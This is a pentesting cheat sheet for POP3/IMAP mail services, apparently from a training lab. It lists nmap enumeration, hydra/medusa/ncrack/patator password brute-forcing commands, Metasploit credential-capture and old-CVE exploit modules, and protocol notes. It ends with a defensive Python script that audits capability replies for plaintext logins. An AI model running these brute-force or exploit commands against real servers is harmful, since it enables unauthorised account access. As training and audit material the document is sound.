Resources

Cheat sheet

Commands

  • Discovery
    nmap 10.129.42.195 -sV -p110,143,993,995 -sC
    nmap -p110,995 --script=banner 10.129.42.195 -sT
  • Scripts
    nmap -p110,995 --script=pop3-ntlm-info 10.129.42.195 -sT
    nmap -p143,993 --script=imap-ntlm-info 10.129.42.195 -sT
    nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p110,995 10.129.42.195
    nmap -v -sV --version-intensity=5 --script pop3-capabilities -p T:110,995 10.129.42.195
    nmap -sV --script=imap-capabilities -p143 10.129.42.195
    nmap -sV --script=imap-ntlm-info.nse -p143,993 10.129.42.195

    msf > use auxiliary/scanner/imap/imap_version
    msf > use auxiliary/scanner/pop3/pop3_version #MetasploitFramework
  • Connect
    • Plaintext
      telnet 10.129.42.195 110
      nc -nv 10.129.42.195 110
      nc -nv 10.129.42.195 143
    • Via SSL
      curl -k 'imaps://10.129.42.195' --user robin:robin -v
      openssl s_client -connect 10.129.42.195:pop3s
      openssl s_client -connect 10.129.42.195:imaps
      openssl s_client -connect 10.129.42.195:995 -crlf -quiet
      openssl s_client -connect 10.129.42.195:993 -quiet
  • Bruteforcing
    hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
    hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
    hydra -t 2 -L users.list -P passwords.list -M 10.10.x.x.list -s 110 pop3
    hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
    hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f 192.168.x.x imap -V
    nmap --script pop3-brute --script-args pop3loginmethod=SASL-LOGIN -p T:110 IP
    nmap --script pop3-brute --script-args pop3loginmethod=SASL-CRAM-MD5 -p T:110 IP
    nmap --script pop3-brute --script-args pop3loginmethod=APOP -p T:110 IP
    nmap --script=imap-brute --script-args userdb=Users.list,passdb=Passwords.list -p143 192.168.x.x

    msf > use auxiliary/scanner/pop3/pop3_login #MetasploitFramework
     
    medusa -t 2 -T 2 -U users.list -P passwords.list -H 10.10.x.x.list -n 110 -M pop3
    ncrack -g CL=2 -U users.list -P passwords.list -iL 10.10.x.x.list -p pop3:110 -oA output
    patator pop3_login host=10.10.x.x user=FILE1 password=FILE0 0=users.list 1=passwords.list -x ignore:fgrep='incorrect password or account name'
  • Read Emails
    • CLI
      mutt -f "imaps://robin@10.129.42.195:993"
    • GUI
      sudo apt install evolution
  • Exploits
    #Fake POP3/IMAP server
    msf > use auxiliary/server/capture/pop3
    msf > use auxiliary/server/capture/imap
    #Seattle Lab Mail 5.5 [CVE-2003-0264]
    msf > use exploit/windows/pop3/seattlelab_pass #MetasploitFramework
    Exploit-DB: 638.py, 643.c, 646.c
    #Cyrus - Gentoo 2006.0 Linux 2.6 [CVE-2006-2502]
    msf > use exploit/linux/pop3/cyrus_pop3d_popsubfolders #Metasploit
    #Eudora Qualcomm WorldMail 3.0 [CVE-2005-4267]
    msf > use exploit/windows/imap/eudora_list

Notes

IMAP VS POP3

The Internet Message Access Protocol (IMAP) gives clients access to emails stored on a mail server. Unlike the Post Office Protocol (POP3), IMAP allows emails to be managed online, directly on the server, and supports folder structures; it is, in effect, a network protocol for managing mail on a remote server. The protocol is client-server based and keeps a local email client synchronized with the mailbox on the server, providing something like a network file system for emails, so several independent clients can stay in sync without conflicts. POP3, by contrast, lacks this functionality: the only operations it offers at the mail server are listing, retrieving, and deleting emails. For additional functionality such as hierarchical mailboxes directly on the mail server, access to multiple mailboxes within one session, and preselection of emails, a protocol such as IMAP must therefore be used.

INFO

By default, POP3 uses ports 110 and 995, and IMAP uses ports 143 and 993. The higher ports (993 and 995) wrap the communication between client and server in TLS/SSL. Using Nmap, we can scan the server for these ports; the scan will return the corresponding information (as seen below) if the server uses an embedded certificate.
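The capability checks in the cheat sheet (pop3-capabilities, imap-capabilities, the openssl s_client connections) are what a reviewer uses to tell whether a server still lets credentials cross the plaintext ports 110 and 143. The Python script below is an added example and not part of the original cheat sheet: it parses a POP3 CAPA reply and an IMAP CAPABILITY line and reports settings a hardened server should not advertise on its plaintext port (no STLS/STARTTLS, plaintext USER or LOGIN accepted, PLAIN/LOGIN SASL mechanisms offered before TLS). The four responses are constructed samples, not captures from any host, and the port numbers follow the defaults stated above.

```python
"""Audit the capability lists POP3 and IMAP servers advertise on their
plaintext ports for settings that let credentials travel unencrypted.

Added example for this cheat sheet; all responses below are constructed
samples, not output captured from any real server.
"""
import re

# --- Constructed sample responses (not real captures) -----------------
POP3_CAPA_WEAK = (
    "+OK Capability list follows\r\n"
    "TOP\r\nUSER\r\nSASL PLAIN LOGIN\r\nUIDL\r\n.\r\n"
)
POP3_CAPA_HARDENED = (
    "+OK Capability list follows\r\n"
    "TOP\r\nSTLS\r\nPIPELINING\r\nUIDL\r\n.\r\n"
)
IMAP_CAP_WEAK = (
    "* CAPABILITY IMAP4rev1 AUTH=PLAIN AUTH=LOGIN IDLE\r\n"
    "a001 OK CAPABILITY completed\r\n"
)
IMAP_CAP_HARDENED = (
    "* CAPABILITY IMAP4rev1 STARTTLS LOGINDISABLED IDLE\r\n"
    "a001 OK CAPABILITY completed\r\n"
)


def parse_pop3_capa(response: str) -> dict:
    """Turn a CAPA reply (RFC 2449) into {CAPABILITY: [args, ...]}."""
    lines = response.split("\r\n")
    if not lines[0].startswith("+OK"):
        raise ValueError("CAPA rejected or not supported: %r" % lines[0])
    caps = {}
    for line in lines[1:]:
        if line == ".":          # terminator of the multi-line reply
            break
        if not line:
            continue
        name, *args = line.split()
        caps[name.upper()] = [a.upper() for a in args]
    return caps


def parse_imap_capability(response: str) -> set:
    """Extract the untagged '* CAPABILITY ...' line (RFC 3501) as a set."""
    match = re.search(r"^\* CAPABILITY (.+?)\r?$", response, re.MULTILINE)
    if match is None:
        raise ValueError("no CAPABILITY response found")
    return {c.upper() for c in match.group(1).split()}


def audit_pop3(caps: dict, port: int) -> list:
    """Findings for a POP3 capability set observed on `port`."""
    findings = []
    if port == 995:              # implicit TLS: transport already protected
        return findings
    if "STLS" not in caps:
        findings.append("no STLS: session cannot be upgraded to TLS")
    if "USER" in caps:
        findings.append("USER/PASS plaintext login advertised before TLS")
    weak = {"PLAIN", "LOGIN"} & set(caps.get("SASL", []))
    if weak:
        findings.append("plaintext SASL mechanisms before TLS: "
                        + ", ".join(sorted(weak)))
    return findings


def audit_imap(caps: set, port: int) -> list:
    """Findings for an IMAP capability set observed on `port`."""
    findings = []
    if port == 993:              # implicit TLS: transport already protected
        return findings
    if "STARTTLS" not in caps:
        findings.append("no STARTTLS: session cannot be upgraded to TLS")
    if "LOGINDISABLED" not in caps:
        findings.append("LOGIN command accepted before TLS")
    weak = sorted(c for c in caps if c in ("AUTH=PLAIN", "AUTH=LOGIN"))
    if weak:
        findings.append("plaintext SASL mechanisms before TLS: "
                        + ", ".join(weak))
    return findings


if __name__ == "__main__":
    checks = [
        ("pop3 weak", audit_pop3(parse_pop3_capa(POP3_CAPA_WEAK), 110)),
        ("pop3 hardened", audit_pop3(parse_pop3_capa(POP3_CAPA_HARDENED), 110)),
        ("imap weak", audit_imap(parse_imap_capability(IMAP_CAP_WEAK), 143)),
        ("imap hardened", audit_imap(parse_imap_capability(IMAP_CAP_HARDENED), 143)),
    ]
    for label, findings in checks:
        print(label, "->", findings or "OK")
```

Feed the parsers the text returned by `CAPA` (POP3) or `a001 CAPABILITY` (IMAP) on the plaintext port; on 993/995 the audit reports nothing, since the transport is already encrypted before any credential is sent.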